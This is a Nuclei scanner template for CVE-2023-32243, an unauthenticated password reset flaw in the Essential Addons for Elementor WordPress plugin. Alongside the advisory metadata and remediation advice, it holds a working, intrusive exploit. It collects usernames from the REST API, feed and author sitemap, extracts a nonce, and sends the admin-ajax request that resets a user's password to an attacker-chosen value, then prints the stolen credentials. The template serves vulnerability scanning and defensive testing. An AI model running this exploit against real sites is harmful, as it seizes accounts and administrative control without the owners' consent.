id: CVE-2023-32243 info: name: WordPress Elementor Lite 5.7.1 - Arbitrary Password Reset author: DhiyaneshDK,Vikas Kundu severity: critical description: | Improper Authentication vulnerability in WPDeveloper Essential Addons for Elementor allows Privilege Escalation. This issue affects Essential Addons for Elementor: from 5.4.0 through 5.7.1. impact: | An attacker can gain unauthorized access to user accounts and potentially take control of the affected WordPress website. remediation: | Update WordPress Elementor Lite plugin to the latest version (5.7.2) or apply the patch provided by the vendor. reference: - https://nvd.nist.gov/vuln/detail/CVE-2023-32243 - https://patchstack.com/articles/critical-privilege-escalation-in-essential-addons-for-elementor-plugin-affecting-1-million-sites?_s_id=cve - https://github.com/RandomRobbieBF/CVE-2023-32243/blob/main/exploit.py - https://wordpress.org/plugins/essential-addons-for-elementor-lite/ - https://patchstack.com/database/vulnerability/essential-addons-for-elementor-lite/wordpress-essential-addons-for-elementor-plugin-5-4-0-5-7-1-unauthenticated-privilege-escalation-vulnerability?_s_id=cve classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-32243 cwe-id: CWE-287 epss-score: 0.03267 epss-percentile: 0.91046 cpe: cpe:2.3:a:wpdeveloper:essential_addons_for_elementor:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 6 vendor: wpdeveloper product: essential_addons_for_elementor framework: wordpress google-query: inurl:/wp-content/plugins/essential-addons-for-elementor-lite tags: cve2023,cve,wordpress,wp,wp-plugin,auth-bypass,intrusive,wpdeveloper http: - raw: - | GET /wp-login.php HTTP/1.1 Host: {{Hostname}} - | GET /wp-json/wp/v2/users/ HTTP/1.1 Host: {{Hostname}} - | GET /?rest_route=/wp/v2/users HTTP/1.1 Host: {{Hostname}} - | GET /feed/ HTTP/1.1 Host: {{Hostname}} - | GET /author-sitemap.xml HTTP/1.1 Host: {{Hostname}} - | POST /wp-admin/admin-ajax.php HTTP/2 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded action=login_or_register_user&eael-resetpassword-submit=true&page_id=124&widget_id=224&eael-resetpassword-nonce={{nonce}}&eael-pass1={{password}}&eael-pass2={{password}}&rp_login={{wordpress_username}} payloads: password: - "{{randstr}}" host-redirects: true max-redirects: 2 stop-at-first-match: true matchers: - type: word part: body_6 words: - '"success":true' - '"data":' condition: and extractors: - type: regex name: nonce part: body_1 group: 1 regex: - 'nonce":"([0-9a-z]+)' internal: true - type: json part: body name: wordpress_username group: 1 json: - '.[] | .slug' - '.[].name' internal: true - type: regex part: body_4 name: wordpress_username group: 1 regex: - '<\/dc:creator>' internal: true - type: regex part: body_5 name: wordpress_username group: 1 regex: - '\/author\/([a-z-]+)\/' internal: true - type: dsl dsl: - '"WP_USERNAME: "+ wordpress_username + " WP_PASSWORD: "+ password' # digest: 4a0a00473045022100a26b83d631646ec09af3af65eb293c9a3f3761a84afecbfca21c5e8f0973d6fe022064a99db818cef379e23b844ee31a73da1796fdad71351add8163625aaf7e6a85:922c64590222798bb761d5b6d8e72950